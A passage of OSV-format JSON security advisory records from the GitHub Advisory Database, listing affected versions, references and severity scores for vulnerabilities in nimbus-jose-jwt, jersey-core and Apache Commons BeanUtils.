"4.16", "4.16.1", "4.16.2", "4.17", "4.18", "4.19", "4.2", "4.20", "4.21", "4.22", "4.23", "4.24", "4.25", "4.26", "4.26.1", "4.27", "4.27.1", "4.28", "4.29", "4.3", "4.3.1", "4.30", "4.31.1", "4.32", "4.33", "4.34", "4.34.1", "4.34.2", "4.35", "4.4", "4.5", "4.6", "4.7", "4.8", "4.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/05/GHSA-pfv2-37f7-9m6w/GHSA-pfv2-37f7-9m6w.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-12974" }, { "type": "WEB", "url": "https://bitbucket.org/connect2id/nimbus-jose-jwt/commits/f3a7a801f0c6b078899fed9226368eb7b44e2b2f" }, { "type": "WEB", "url": "https://bitbucket.org/connect2id/nimbus-jose-jwt/issues/217/explicit-check-for-ec-public-key-on-curve" }, { "type": "WEB", "url": "https://bitbucket.org/connect2id/nimbus-jose-jwt/src/master/CHANGELOG.txt" }, { "type": "PACKAGE", "url": "https://github.com/felx/nimbus-jose-jwt" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/9317fd092b257a0815434b116a8af8daea6e920b6673f4fd5583d5fe@%3Ccommits.druid.apache.org%3E" } ], "database_specific": { "cwe_ids": [ "CWE-347" ], "github_reviewed": true, "github_reviewed_at": "2022-07-01T20:20:30Z", "nvd_published_at": "2017-08-20T16:29:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-xwmg-2g98-w7v9", "published": "2025-07-11T03:30:34Z", "modified": "2025-09-19T21:45:11.861171Z", "aliases": [ "CVE-2025-53864" ], "related": [ "CGA-3852-7xcx-96qx", "CGA-8gr5-54h9-6g76", "CGA-c923-6h8p-37xc", "CGA-cxqr-5r5g-9rgj", "CGA-mpwh-pghw-hw5x" ], "summary": "Nimbus JOSE + JWT is vulnerable to DoS attacks when processing deeply nested JSON", "details": "Connect2id Nimbus JOSE + JWT before 10.0.2 allows a remote attacker to cause a denial of service via a deeply nested JSON object supplied in a JWT claim set, 
because of uncontrolled recursion. NOTE: this is independent of the Gson 2.11.0 issue because the Connect2id product could have checked the JSON object nesting depth, regardless of what limits (if any) were imposed by Gson.", "affected": [ { "package": { "name": "com.nimbusds:nimbus-jose-jwt", "ecosystem": "Maven", "purl": "pkg:maven/com.nimbusds/nimbus-jose-jwt" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "9.38-rc1" }, { "fixed": "10.0.2" } ] } ], "versions": [ "10.0", "10.0.1", "9.38", "9.38-rc1", "9.38-rc3", "9.38-rc4", "9.38-rc5", "9.39", "9.39.1", "9.39.2", "9.39.3", "9.40", "9.41", "9.41.1", "9.41.2", "9.42", "9.43", "9.44", "9.45", "9.46", "9.47", "9.48" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/07/GHSA-xwmg-2g98-w7v9/GHSA-xwmg-2g98-w7v9.json" } }, { "package": { "name": "com.nimbusds:nimbus-jose-jwt", "ecosystem": "Maven", "purl": "pkg:maven/com.nimbusds/nimbus-jose-jwt" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "9.37.4" } ] } ], "versions": [ "2.10", "2.10.1", "2.11.0", "2.12.0", "2.13.0", "2.13.1", "2.14.0", "2.15.0", "2.15.1", "2.15.2", "2.16", "2.17", "2.17.1", "2.17.2", "2.18", "2.18.1", "2.18.2", "2.19", "2.19.1", "2.20", "2.21", "2.22", "2.22.1", "2.23", "2.24", "2.25", "2.26", "2.26.1", "2.9", "3.0", "3.1", "3.1.1", "3.1.2", "3.10", "3.2", "3.2.1", "3.2.2", "3.3", "3.4", "3.5", "3.6", "3.7", "3.8", "3.8.1", "3.8.2", "3.9", "3.9.1", "3.9.2", "4.0", "4.0-rc1", "4.0-rc2", "4.0-rc3", "4.0-rc4", "4.0.1", "4.1", "4.1.1", "4.10", "4.11", "4.11.1", "4.11.2", "4.12", "4.13", "4.13.1", "4.14", "4.15", "4.15.1", "4.16", "4.16.1", "4.16.2", "4.17", "4.18", "4.19", "4.2", "4.20", "4.21", "4.22", "4.23", "4.24", "4.25", "4.26", "4.26.1", "4.27", "4.27.1", "4.28", "4.29", "4.3", "4.3.1", "4.30", "4.31.1", "4.32", "4.33", "4.34", "4.34.1", "4.34.2", "4.35", "4.36", "4.36.1", "4.37", "4.37.1", "4.38", "4.39", "4.39.1", 
"4.39.2", "4.4", "4.40", "4.41", "4.41.1", "4.41.2", "4.41.3", "4.5", "4.6", "4.7", "4.8", "4.9", "5.0", "5.1", "5.10", "5.11", "5.12", "5.13", "5.14", "5.2", "5.3", "5.4", "5.5", "5.6", "5.7", "5.8", "5.9", "6.0", "6.0.1", "6.0.2", "6.1", "6.1.1", "6.2", "6.3", "6.3.1", "6.4", "6.4.1", "6.4.2", "6.5", "6.5.1", "6.6", "6.7", "6.8", "7.0", "7.0.1", "7.1", "7.2.1", "7.3", "7.4", "7.5", "7.5.1", "7.6", "7.7", "7.8", "7.8.1", "7.9", "8.0", "8.1", "8.10", "8.11", "8.12", "8.13", "8.14", "8.14.1", "8.15", "8.16", "8.17", "8.17.1", "8.18", "8.18.1", "8.19", "8.2", "8.2.1", "8.20", "8.20.1", "8.20.2", "8.21", "8.21.1", "8.22", "8.22.1", "8.23", "8.3", "8.4", "8.4.1", "8.5", "8.5.1", "8.6", "8.7", "8.8", "8.9", "9.0", "9.0.1", "9.1", "9.1.1", "9.1.2", "9.1.3", "9.1.4", "9.1.5", "9.10", "9.10.1", "9.11", "9.11.1", "9.11.2", "9.11.3", "9.12", "9.12.1", "9.13", "9.14", "9.15", "9.15.1", "9.15.2", "9.16", "9.16-preview.1", "9.16.1", "9.17", "9.18", "9.19", "9.2", "9.20", "9.21", "9.21.1", "9.22", "9.23", "9.24", "9.24.1", "9.24.2", "9.24.3", "9.24.4", "9.25", "9.25.1", "9.25.2", "9.25.3", "9.25.4", "9.25.5", "9.25.6", "9.26", "9.27", "9.28", "9.29", "9.3", "9.30", "9.30.1", "9.30.2", "9.31", "9.32", "9.33", "9.34", "9.35", "9.36", "9.37", "9.37.1", "9.37.2", "9.37.3", "9.4", "9.4.1", "9.4.2", "9.5", "9.6", "9.6.1", "9.7", "9.8", "9.8.1", "9.9", "9.9.1", "9.9.2", "9.9.3" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/07/GHSA-xwmg-2g98-w7v9/GHSA-xwmg-2g98-w7v9.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-53864" }, { "type": "WEB", "url": "https://github.com/google/gson/commit/1039427ff0100293dd3cf967a53a55282c0fef6b" }, { "type": "PACKAGE", "url": "https://bitbucket.org/connect2id/nimbus-jose-jwt" }, { "type": "WEB", "url": "https://bitbucket.org/connect2id/nimbus-jose-jwt/commits/f7fb882cc08f027c9ceb874acec3b51c6222861c" }, { "type": "WEB", "url": 
"https://bitbucket.org/connect2id/nimbus-jose-jwt/issues/583/stackoverflowerror-due-to-deeply-nested" }, { "type": "WEB", "url": "https://bitbucket.org/connect2id/nimbus-jose-jwt/issues/593/back-port-cve-2025-53864-fix-to-9x-branch" }, { "type": "WEB", "url": "https://github.com/google/gson/compare/gson-parent-2.11.0...gson-parent-2.12.0" } ], "database_specific": { "cwe_ids": [ "CWE-674" ], "github_reviewed": true, "github_reviewed_at": "2025-07-11T16:43:40Z", "nvd_published_at": "2025-07-11T03:16:03Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:L" } ] }, { "schema_version": "1.7.3", "id": "GHSA-5m48-vr54-vmh3", "published": "2022-05-17T19:57:08Z", "modified": "2025-06-19T18:13:37.881595Z", "aliases": [ "CVE-2014-3643" ], "summary": "jersey: XXE via parameter entities", "details": "jersey: XXE via parameter entities not disabled by the jersey SAX parser", "affected": [ { "package": { "name": "com.sun.jersey:jersey-core", "ecosystem": "Maven", "purl": "pkg:maven/com.sun.jersey/jersey-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.13" } ] } ], "versions": [ "0.9-ea", "1.0", "1.0.1", "1.0.2", "1.0.3", "1.0.3.1", "1.1.0-ea", "1.1.1-ea", "1.1.2-ea", "1.1.3-ea", "1.1.4", "1.1.4.1", "1.1.5", "1.1.5-ea-20100104", "1.1.5-ea-v20091019", "1.1.5.1", "1.1.5.2", "1.10", "1.10-b01", "1.10-b02", "1.10-b03", "1.10-b04", "1.10-b05", "1.11", "1.11-b01", "1.11-b02", "1.11-b03", "1.11-b04", "1.11.1", "1.11.2", "1.12", "1.12-b01", "1.13-b01", "1.2", "1.3", "1.4", "1.4-ea01", "1.4-ea02", "1.4-ea03", "1.4-ea04", "1.4-ea05", "1.4-ea06", "1.5", "1.5-ea01", "1.5-ea02", "1.5-ea03", "1.5-ea04", "1.5-ea05", "1.5-ea06", "1.5-ea07", "1.5-ea08", "1.5-ea09", "1.6", "1.6-ea01", "1.6-ea02", "1.6-ea03", "1.6-ea04", "1.6-ea05", "1.6-ea06", "1.7", "1.7-ea01", "1.7-ea02", "1.7-ea03", "1.7-ea04", "1.7-ea05", "1.7-ea06", "1.7-ea07", "1.8", "1.8-ea01", "1.8-ea02", "1.8-ea03", "1.8-ea04", 
"1.9", "1.9-ea01", "1.9-ea02", "1.9-ea03", "1.9-ea04", "1.9-ea06", "1.9-ea07", "1.9.1" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/05/GHSA-5m48-vr54-vmh3/GHSA-5m48-vr54-vmh3.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2014-3643" }, { "type": "WEB", "url": "https://github.com/javaee/jersey-1.x/commit/49f1e5a6ac608ccb51939205e4739f328f2223e6" }, { "type": "WEB", "url": "https://access.redhat.com/security/cve/cve-2014-3643" }, { "type": "WEB", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2014-3643" }, { "type": "PACKAGE", "url": "https://github.com/javaee/jersey-1.x" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujul2022.html" }, { "type": "WEB", "url": "https://www.sourceclear.com/vulnerability-database/security/xml-external-entity-xxe/java/sid-22175" } ], "database_specific": { "cwe_ids": [ "CWE-611" ], "github_reviewed": true, "github_reviewed_at": "2025-06-19T17:08:27Z", "nvd_published_at": "2019-12-15T22:15:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-6phf-73q6-gh87", "published": "2020-06-15T20:36:17Z", "modified": "2024-03-08T05:28:43.649817Z", "aliases": [ "CVE-2019-10086" ], "related": [ "CGA-3x75-f9j7-7hm9" ], "summary": "Insecure Deserialization in Apache Commons Beanutils", "details": "In Apache Commons Beanutils 1.9.2, a special BeanIntrospector class was added which allows suppressing the ability for an attacker to access the classloader via the class property available on all Java objects. 
We, however were not using this by default characteristic of the PropertyUtilsBean.", "affected": [ { "package": { "name": "commons-beanutils:commons-beanutils", "ecosystem": "Maven", "purl": "pkg:maven/commons-beanutils/commons-beanutils" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.9.4" } ] } ], "versions": [ "1.0", "1.2", "1.3", "1.4", "1.4.1", "1.5", "1.6", "1.6.1", "1.7.0", "1.8.0", "1.8.0-BETA", "1.8.1", "1.8.2", "1.8.3", "1.9.0", "1.9.1", "1.9.2", "1.9.3" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/06/GHSA-6phf-73q6-gh87/GHSA-6phf-73q6-gh87.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-10086" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:4317" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ra41fd0ad4b7e1d675c03a5081a16a6603085a4e37d30b866067566fe@%3Cissues.nifi.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ra87ac17410a62e813cba901fdd4e9a674dd53daaf714870f28e905f1@%3Cdev.atlas.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ra9a139fdc0999750dcd519e81384bc1fe3946f311b1796221205f51c@%3Ccommits.dolphinscheduler.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/racd3e7b2149fa2f255f016bd6bffab0fea77b6fb81c50db9a17f78e6@%3Cdev.atlas.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rae81e0c8ebdf47ffaa85a01240836bfece8a990c48f55c7933162b5c@%3Cdev.atlas.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rb1f76c2c0a4d6efb8a3523974f9d085d5838b73e7bffdf9a8f212997@%3Cissues.nifi.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rb8dac04cb7e9cc5dedee8dabaa1c92614f590642e5ebf02a145915ba@%3Ccommits.atlas.apache.org%3E" }, { "type": "WEB", "url": 
"https://lists.apache.org/thread.html/rcc029be4edaaf5b8bb85818aab494e16f312fced07a0f4a202771ba2@%3Cissues.nifi.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rd2d2493f4f1af6980d265b8d84c857e2b7ab80a46e1423710c448957@%3Cissues.nifi.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/re2028d4d76ba1db3e3c3a722d6c6034e801cc3b309f69cc166eaa32b@%3Ccommits.nifi.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/re3cd7cb641d7fc6684e4fc3c336a8bad4a01434bb5625a06e3600fd1@%3Cissues.nifi.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rec74f3a94dd850259c730b4ba6f7b6211222b58900ec088754aa0534@%3Cissues.nifi.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/reee57101464cf7622d640ae013b2162eb864f603ec4093de8240bb8f@%3Cdev.atlas.apache.org%3E" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2019/08/msg00030.html" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4APPGLBWMFAS4WHNLR4LIJ65DJGPV7TF" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JIUYSL2RSIWZVNSUIXJTIFPIPIF6OAIO" }, { "type": "WEB", "url": "https://www.oracle.com//security-alerts/cpujul2021.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuApr2021.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuapr2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuapr2022.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujan2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujan2021.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujan2022.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujul2020.html" }, { "type": "WEB", "url": 
"https://www.oracle.com/security-alerts/cpujul2022.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2021.html" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2020:0057" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2020:0194" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2020:0804" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2020:0805" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2020:0806" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2020:0811" }, { "type": "PACKAGE", "url": "https://github.com/apache/commons-beanutils" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/02094ad226dbc17a2368beaf27e61d8b1432f5baf77d0ca995bb78bc@%3Cissues.commons.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/1f78f1e32cc5614ec0c5b822ba4bd7fc8e8b5c46c8e038b6bd609cb5@%3Cissues.commons.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/2fd61dc89df9aeab738d2b49f48d42c76f7d53b980ba04e1d48bce48@%3Cdev.shiro.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/3d1ed1a1596c08c4d5fea97b36c651ce167b773f1afc75251ce7a125@%3Ccommits.tinkerpop.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/519eb0fd45642dcecd9ff74cb3e71c20a4753f7d82e2f07864b5108f@%3Cdev.drill.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/5261066cd7adee081ee05c8bf0e96cf0b2eeaced391e19117ae4daa6@%3Cdev.shiro.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/956995acee0d8bc046f1df0a55b7fbeb65dd2f82864e5de1078bacb0@%3Cissues.commons.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/a684107d3a78e431cf0fbb90629e8559a36ff8fe94c3a76e620b39fa@%3Cdev.shiro.apache.org%3E" }, { "type": "WEB", "url": 
"https://lists.apache.org/thread.html/b0656d359c7d40ec9f39c8cc61bca66802ef9a2a12ee199f5b0c1442@%3Cdev.drill.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/c94bc9649d5109a663b2129371dc45753fbdeacd340105548bbe93c3@%3Cdev.shiro.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/d6ca9439c53374b597f33b7ec180001625597db48ea30356af01145f@%3Cdev.shiro.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/f9bc3e55f4e28d1dcd1a69aae6d53e609a758e34d2869b4d798e13cc@%3Cissues.drill.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r18d8b4f9263e5cad3bbaef0cdba0e2ccdf9201316ac4b85e23eb7ee4@%3Cdev.atlas.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r2d5f1d88c39bd615271abda63964a0bee9b2b57fef1f84cb4c43032e@%3Cissues.nifi.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r306c0322aa5c0da731e03f3ce9f07f4745c052c6b73f4e78faf232ca@%3Cdev.atlas.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r43de02fd4a4f52c4bdeff8c02f09625d83cd047498009c1cdab857db@%3Cdev.rocketmq.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r46e536fc98942dce99fadd2e313aeefe90c1a769c5cd85d98df9d098@%3Cissues.nifi.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r513a7a21c422170318115463b399dd58ab447fe0990b13e5884f0825@%3Ccommits.dolphinscheduler.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r6194ced4828deb32023cd314e31f41c61d388b58935d102c7de91f58@%3Cdev.atlas.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r967953a14e05016bc4bcae9ef3dd92e770181158b4246976ed8295c9@%3Cdev.brooklyn.apache.org%3E" }, { "type": "WEB", "url": "http://lists.opensuse.org/opensuse-security-announce/2019-09/msg00007.html" }, { "type": "WEB", "url": 
"http://mail-archives.apache.org/mod_mbox/www-announce/201908.mbox/%3cC628798F-315D-4428-8CB1-4ED1ECC958E4@apache.org%3e" } ], "database_specific": { "cwe_ids": [ "CWE-502" ], "github_reviewed": true, "github_reviewed_at": "2020-06-11T15:08:49Z", "nvd_published_at": "2019-08-20T21:15:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L" } ] }, { "schema_version": "1.7.3", "id": "GHSA-p66x-2cv9-qq3v", "published": "2020-06-10T23:38:01Z", "modified": "2024-12-01T05:31:59.449737Z", "aliases": [ "CVE-2014-0114" ], "summary": "Arbitrary code execution in Apache Commons BeanUtils", "details": "Apache Commons BeanUtils, as distributed in lib/commons-beanutils-1.8.0.jar in Apache Struts 1.x through 1.3.10 and in other products requiring commons-beanutils through 1.9.2, does not suppress the class property, which allows remote attackers to \"manipulate\" the ClassLoader and execute arbitrary code via the class parameter, as demonstrated by the passing of this parameter to the getClass method of the ActionForm object in Struts 1.", "affected": [ { "package": { "name": "commons-beanutils:commons-beanutils", "ecosystem": "Maven", "purl": "pkg:maven/commons-beanutils/commons-beanutils" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "1.8.0" }, { "fixed": "1.9.4" } ] } ], "versions": [ "1.8.0", "1.8.1", "1.8.2", "1.8.3", "1.9.0", "1.9.1", "1.9.2", "1.9.3" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/06/GHSA-p66x-2cv9-qq3v/GHSA-p66x-2cv9-qq3v.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2014-0114" }, { "type": "WEB", "url": "https://github.com/apache/commons-beanutils/pull/7" }, { "type": "WEB", "url": "https://github.com/apache/commons-beanutils/commit/62e82ad92cf4818709d6044aaf257b73d42659a4" }, { "type": "WEB", "url": 
"https://lists.apache.org/thread.html/aa4ca069c7aea5b1d7329bc21576c44a39bcc4eb7bb2760c4b16f2f6%40%3Cissues.commons.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/aa4ca069c7aea5b1d7329bc21576c44a39bcc4eb7bb2760c4b16f2f6@%3Cissues.commons.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/b0656d359c7d40ec9f39c8cc61bca66802ef9a2a12ee199f5b0c1442%40%3Cdev.drill.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/b0656d359c7d40ec9f39c8cc61bca66802ef9a2a12ee199f5b0c1442@%3Cdev.drill.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/c24c0b931632a397142882ba248b7bd440027960f22845c6f664c639%40%3Ccommits.commons.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/c24c0b931632a397142882ba248b7bd440027960f22845c6f664c639@%3Ccommits.commons.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/c70da3cb6e3f03e0ad8013e38b6959419d866c4a7c80fdd34b73f25c%40%3Ccommits.pulsar.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/c70da3cb6e3f03e0ad8013e38b6959419d866c4a7c80fdd34b73f25c@%3Ccommits.pulsar.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/c7e31c3c90b292e0bafccc4e1b19c9afc1503a65d82cb7833dfd7478%40%3Cissues.commons.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/c7e31c3c90b292e0bafccc4e1b19c9afc1503a65d82cb7833dfd7478@%3Cissues.commons.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/cee6b1c4533be1a753614f6a7d7c533c42091e7cafd7053b8f62792a%40%3Cissues.commons.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/cee6b1c4533be1a753614f6a7d7c533c42091e7cafd7053b8f62792a@%3Cissues.commons.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/d27c51b3c933f885460aa6d3004eb228916615caaaddbb8e8bfeeb40%40%3Cgitbox.activemq.apache.org%3E" }, { 
"type": "WEB", "url": "https://lists.apache.org/thread.html/d27c51b3c933f885460aa6d3004eb228916615caaaddbb8e8bfeeb40@%3Cgitbox.activemq.apache.org%3E" }, { "type": "WEB", "url": "https://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/9b5505632f5683ee17bda4f7878525e672226c7807d57709283ffa64@%3Cissues.commons.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/9b5505632f5683ee17bda4f7878525e672226c7807d57709283ffa64%40%3Cissues.commons.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/97fc033dad4233a5d82fcb75521eabdd23dd99ef32eb96f407f96a1a@%3Cissues.commons.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/97fc033dad4233a5d82fcb75521eabdd23dd99ef32eb96f407f96a1a%40%3Cissues.commons.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/956995acee0d8bc046f1df0a55b7fbeb65dd2f82864e5de1078bacb0@%3Cissues.commons.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/956995acee0d8bc046f1df0a55b7fbeb65dd2f82864e5de1078bacb0%40%3Cissues.commons.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/9317fd092b257a0815434b116a8af8daea6e920b6673f4fd5583d5fe@%3Ccommits.druid.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/9317fd092b257a0815434b116a8af8daea6e920b6673f4fd5583d5fe%40%3Ccommits.druid.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/918ec15a80fc766ff46c5d769cb8efc88fed6674faadd61a7105166b@%3Cannounce.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/918ec15a80fc766ff46c5d769cb8efc88fed6674faadd61a7105166b%40%3Cannounce.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/8e2bdfabd5b14836aa3cf900aa0a62ff9f4e22a518bb4e553ebcf55f@%3Cissues.commons.apache.org%3E" }, { "type": "WEB", "url": 
"https://lists.apache.org/thread.html/8e2bdfabd5b14836aa3cf900aa0a62ff9f4e22a518bb4e553ebcf55f%40%3Cissues.commons.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/88c497eead24ed517a2bb3159d3dc48725c215e97fe7a98b2cf3ea25@%3Cdev.commons.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/88c497eead24ed517a2bb3159d3dc48725c215e97fe7a98b2cf3ea25%40%3Cdev.commons.apache.org%3E" }, { "type": "WEB", "url": "https://www.oracle.com/technetwork/security-advisory/cpujan2019-5072801.html" }, { "type": "WEB", "url": "https://www.oracle.com/technetwork/security-advisory/cpuapr2019-5072813.html" }, { "type": "WEB", "url": "https://web.archive.org/web/20150710065242/http://www.securityfocus.com/archive/1/534161/100/0/threaded" }, { "type": "WEB", "url": "https://web.archive.org/web/20140618110851/http://www.securityfocus.com/bid/67121" }, { "type": "WEB", "url": "https://snyk.io/vuln/SNYK-JAVA-COMMONSBEANUTILS-30077" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20180629-0006" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20140911-0001" }, { "type": "WEB", "url": "https://security.gentoo.org/glsa/201607-09" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rf5230a049d989dbfdd404b4320a265dceeeba459a4d04ec21873bd55%40%3Csolr-user.lucene.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r75d67108e557bb5d4c4318435067714a0180de525314b7e8dab9d04e@%3Cissues.activemq.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r75d67108e557bb5d4c4318435067714a0180de525314b7e8dab9d04e%40%3Cissues.activemq.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r458d61eaeadecaad04382ebe583230bc027f48d9e85e4731bc573477%40%3Ccommits.dolphinscheduler.apache.org%3E" }, { "type": "WEB", "url": 
"https://lists.apache.org/thread.html/r204ba2a9ea750f38d789d2bb429cc0925ad6133deea7cbc3001d96b5@%3Csolr-user.lucene.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r204ba2a9ea750f38d789d2bb429cc0925ad6133deea7cbc3001d96b5%40%3Csolr-user.lucene.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ffde3f266d3bde190b54c9202169e7918a92de7e7e0337d792dc7263@%3Cissues.commons.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ffde3f266d3bde190b54c9202169e7918a92de7e7e0337d792dc7263%40%3Cissues.commons.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/fda473f46e51019a78ab217a7a3a3d48dafd90846e75bd5536ef72f3@%3Cnotifications.commons.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/fda473f46e51019a78ab217a7a3a3d48dafd90846e75bd5536ef72f3%40%3Cnotifications.commons.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/f9bc3e55f4e28d1dcd1a69aae6d53e609a758e34d2869b4d798e13cc@%3Cissues.drill.apache.org%3E" }, { "type": "WEB", "url": 